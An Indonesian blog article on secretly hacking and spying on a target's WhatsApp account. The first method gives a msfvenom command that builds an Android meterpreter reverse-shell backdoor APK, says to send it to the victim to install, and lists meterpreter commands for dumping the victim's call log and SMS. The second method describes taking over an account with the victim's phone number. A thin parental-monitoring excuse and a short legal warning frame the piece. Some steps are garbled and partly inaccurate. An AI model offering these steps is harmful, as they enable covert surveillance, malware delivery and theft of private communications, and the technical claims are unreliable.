Script HTML Hack WA 2022

Script HTML Hack WA
Script HTML Hack WA
- Jika anda ingin melakukan penyadapan atau ingin memata-matai kegiatan apa saja yang dilakukan oleh pengguna akunWhatsApp menjadi target anda.

Apa lagi penyadapan ini dapat di lakukan oleh orang tua, dalam hal mengawasi anak-anaknya dengan tujuan yang positif dan lain sebagainya.

Disaat yang tepat, sebab kami akan memberikan penjelasan cara menghack WhatsApp menggunakan Script HTML hack di WhatsApp.

Pasalnya ada beberapa cara yang di lakukan dalam hal ini, termasuk dengan memakai aplikasi Termux pada HP Android kalau anda penasaran gimana sih cara menggunakannya?.


Itu sebabnya, agar anda anda mengetahui gimana cara menggunakan Script HTML hack WA maka anda simak ulasan sebagai berikut ini.


Script HTML Hack WA


1. Script HTML Hack WA dengan Aplikasi Termux

Script HTML Hack WA
Script HTML Hack WA dengan Aplikasi Termux
Pasalnya aplikasi Termux cukup populer dikalangan para hacker, baik itu pemula maupun yang sudah profesional sebagai salah satu bahan dasar mereka dalam melakukan aktivitas hacking.

Bukan itu saja, bahwasannya aplikasi Termux sudah terbukti sangat ampuh dalam melakukan penyadapan termasuk di akun WhatsApp.

Apa lagi, jika anda menggunakan Aplikasi Termux anda dapat melakukan hack tanpa harus menyentuh HP sik target lho pastinya anda sudah gak sabar dan ingin mengetahui cara penggunaannya.


Berikut script HTML hack WA dengan aplikasi termux:
  • Terlebih dahulu anda harus memastikan jika perangkat atau Smartphone-nya maksimal mempunyai Operasi Sistem (OS) Lolipop 5.0 keatas, 32 atau 64 bit keatas.
  • Untuk itu, anda unduh aplikasi Termux di Google Play Store atau silahkan anda kunjungi melalui link berikut ini Aplikasi Termux.
  • Setelah itu, anda lihatlah alamat IP-nya dengan cara ketik ifconfog di aplikasi Termux.
  • Lalu anda ketik script termux penyadapan WhatsApp tersebut: msfvenom -p android/meterpreter/reverse_tcp LHOST =192.168.43.166 LPORT =4444 R >hack.ap.
  • LHOST dikalimat yang sebelumnya langsung ganti dengan alamat IP anda sendiri yang telah anda lihat pada langkah awal tadi.
  • Selanjutnya anda buka menu File > Home > hack apk, agar melihat file backdoor yang telah jadi barusan.
  • Pada langkah selanjutnya yakni anda tinggal kirim file backdoor ini ke target anda entah itu melalui messengger, WhatsApp dan lain sebagainya.
  • Jika target sudah berhasil menginstall file apk yang telah anda kirimkan, itu artinya anda sudah bisa melihat atau menyadap akun WhatsApp sik target.
  • Akan tetapi, gimana cara melihat hasil penyadapan yang kita lakukan apakah bekerja atau tidak? Untuk itu, anda bisa melihatnya sebagai berikut:
  • Supaya dapat melihat history panggilan terget langsung saja ketik dump_callog.
  • Supaya bisa melihat riwayat pesan akun WhatsApp target silahkan anda ketik dump_sms.


2. Script HTML Hack WA

Script HTML Hack WA
Script HTML Hack WA
Jika Smartphone anda belum bisa sama sekali menginstall aplikasi Termux, eits jangan risau sebab anda dapat melakukan penyadapan tanpa tambahan aplikasi termasuk aplikasi Termux sendiri.


Berikut script HTML hack WA:
  • Terlebih dahulu, anda harus memastikan bahwasannya aplikasi WhatsApp yang ada di Smartphonenya versi baru.
  • Jika anda ingin memulai melakukan penyadapan, maka anda tinggal cari tahu terlebih dahulu nomor HP dan alamat email terget.
  • Lalu anda tinggal masuk ke dalam aplikasi WhatsApp dengan nomor Smartphone sik target.
  • Setelah itu, anda lakukan sistem Set Up.
  • Maka pihak dari aplikasi akan mengirimkan kode konfrimasi ke dalam nomor yang di daftarkan barusan.
  • Tahap ini, maka anda sudah berhasil melakukan penyadapan akun WhatsApp sik target.


Akhir Kata

Begitulah penjelasan yang telah kami sampaikan untuk anda, tentu saja dengan cara ini anda bisa melakukan penyadapan tanpa harus menyentuh HP sik korban.

Bahkan caranya cukuplah mudah untuk anda gunakan, baik itu untuk pemula maupun yang sudah profesional dalam melakukan hacking seperti ini.

Namun kami ingatkan, jika melakukan hal ini ada resiko yang nantinya anda tanggung sendiri sebab dalam hal tersebut dapat merugikan orang lain dan termasuk melanggar hukum.

Itulah seluruh isi artikel kita kali ini mengenai script HTML hack WA. Sekian dan semoga bermanfaat.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel